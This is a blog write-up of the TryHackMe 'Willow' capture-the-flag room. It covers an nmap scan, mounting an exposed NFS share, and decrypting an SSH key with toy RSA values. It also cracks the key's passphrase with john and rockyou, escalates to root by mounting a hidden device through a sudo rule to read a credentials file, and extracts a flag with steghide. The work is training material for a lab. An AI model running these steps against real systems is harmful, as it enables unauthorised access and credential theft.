Open in app

Sign in

Write

Sign in

WriteUp — TryHackMe Willow

Jari Laurila
4 min readNov 9, 2020

--

What lies under the Willow Tree?

This is a writeup for TryHackMe room Willow.

Photo by 捷 简 on Unsplash

Reconnaissance

Let’s start with a nmap scan.

nmap -sC -sV -p- 10.10.27.167 
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-08 17:29 EET
Nmap scan report for 10.10.27.167
Host is up (0.055s latency).
Not shown: 65531 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|   1024 43:b0:87:cd:e5:54:09:b1:c1:1e:78:65:d9:78:5e:1e (DSA)
|   2048 c2:65:91:c8:38:c9:cc:c7:f9:09:20:61:e5:54:bd:cf (RSA)
|   256 bf:3e:4b:3d:78:b6:79:41:f4:7d:90:63:5e:fb:2a:40 (ECDSA)
|_  256 2c:c8:87:4a:d8:f6:4c:c3:03:8d:4c:09:22:83:66:64 (ED25519)
80/tcp   open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Recovery Page
111/tcp  open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100003  2,3,4       2049/udp   nfs
|   100003  2,3,4       2049/udp6  nfs
|   100005  1,2,3      34203/udp6  mountd
|   100005  1,2,3      40275/tcp6  mountd
|   100005  1,2,3      48819/tcp   mountd
|   100005  1,2,3      49052/udp   mountd
|   100021  1,3,4      43589/tcp   nlockmgr
|   100021  1,3,4      53328/tcp6  nlockmgr
|   100021  1,3,4      55118/udp   nlockmgr
|   100021  1,3,4      56587/udp6  nlockmgr
|   100024  1          44274/udp6  status
|   100024  1          54815/tcp   status
|   100024  1          58885/tcp6  status
|   100024  1          59124/udp   status
|   100227  2,3         2049/tcp   nfs_acl
|   100227  2,3         2049/tcp6  nfs_acl
|   100227  2,3         2049/udp   nfs_acl
|_  100227  2,3         2049/udp6  nfs_acl
2049/tcp open  nfs_acl 2-3 (RPC #100227)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Web server enumeration

On the main page there is a long string of numbers and some characters:

I upload it to Cyberchef and convert from hexdump. It seems to be SSH private key encrypted somehow.

Hey Willow, here's your SSH Private key -- you know where the decryption key is!
2367 2367 2367 2367 2367 9709 8600 28638 18410 1735 33029 16186 28374 37248 33029 26842 16186 18410 23219 37248 11339 8600 33029 35670 8600 31131 2367 2367 2367 2367 2367 14422 26842 9450 14605 19276 2367 11339 33006 36500 4198 33781 33029 11405 5267 8600 1735 17632 16186 31131 26842 11339 8600 35734 14422 35734 8600 35670 2367 ......
14605 37438 12244 19396 19276 14422 2367 2367 2367 2367 2367 8600 1735 35734 33029 16186 28374 37248 33029 26842 16186 18410 23219 37248 11339 8600 33029 35670 8600 31131 2367 2367 2367 2367 2367

Enumerating NFS

Web server enumeration with gobuster or nikto didn’t discover anything more so let’s look at NFS. Start by enumerating the mounts:

/usr/sbin/showmount -e 10.10.27.167 
Export list for 10.10.27.167:
/var/failsafe *

Then mount the share (I think the last time I mounted NFS was over 15 years ago):

sudo mount -t nfs 10.10.27.167:/var/failsafe /tmp/foo -o nolock

There is a single file, get the contents:

cat rsa_keys 
Public Key Pair: (23, 37627)
Private Key Pair: (61527, 37627)

So now we have the key and the cipher and need to figure out how to decrypt it. RSA decryption works using a private key(d,n) to decrypt a character using a formula character^d mod n. Time for a small Python script:

That yields us a RSA key, but it’s protected by a passphase. Let’s crack it:

/usr/share/john/ssh2john.py rsa_key > hash
john hash --wordlist=/usr/share/wordlists/rockyou.txt

And now we can login to the server. The flag is in a file called user.jpg. I leave it as en exercise to figure out how to extract the flag from that file.

Privesc

sudo -l
Matching Defaults entries for willow on willow-tree:
 env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser willow may run the following commands on willow-tree:
 (ALL : ALL) NOPASSWD: /bin/mount /dev/*

ok, quite specific command with no clear exploit in GTFOBins. Maybe we really need to mount something? What block devices are there?

ls -la /dev | grep -e "^b"
brw-rw----   1 root disk    202,   5 Nov  9 14:20 hidden_backup
brw-rw----   1 root disk    202,   0 Nov  9 14:20 xvda
brw-rw----   1 root disk    202,   1 Nov  9 14:20 xvda1
brw-rw----   1 root disk    202,   2 Nov  9 14:20 xvda2
brw-rw----   1 root disk    202,   3 Nov  9 14:20 xvda3
brw-rw----   1 root disk    202, 112 Nov  9 14:20 xvdh

ok, one device sticks out. Let’s mount it:

sudo mount /dev/hidden_backup /tmp/bar

Then navigate to mount point and dump the only file:

cat creds.txt 
root:__REDACTED__
willow:__REDACTED__

So we can login as root. BOOM! But where is my flag:

cat root.txt 
This would be too easy, don't you think? I actually gave you the root flag some time ago.
You've got my password now -- go find your flag!

This one was quite an easy guess, run steghide to the user.jpg file with root password:

steghide extract -sf user.jpg   
Enter passphrase: 
wrote extracted data to "root.txt".

That’s all folks!

Cybe
Thm Writeup

--

--

Jari Laurila
Jari Laurila

Written by Jari Laurila

7 Followers
3 Following

CTO by day, learning cybersecurity by night.

No responses yet

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams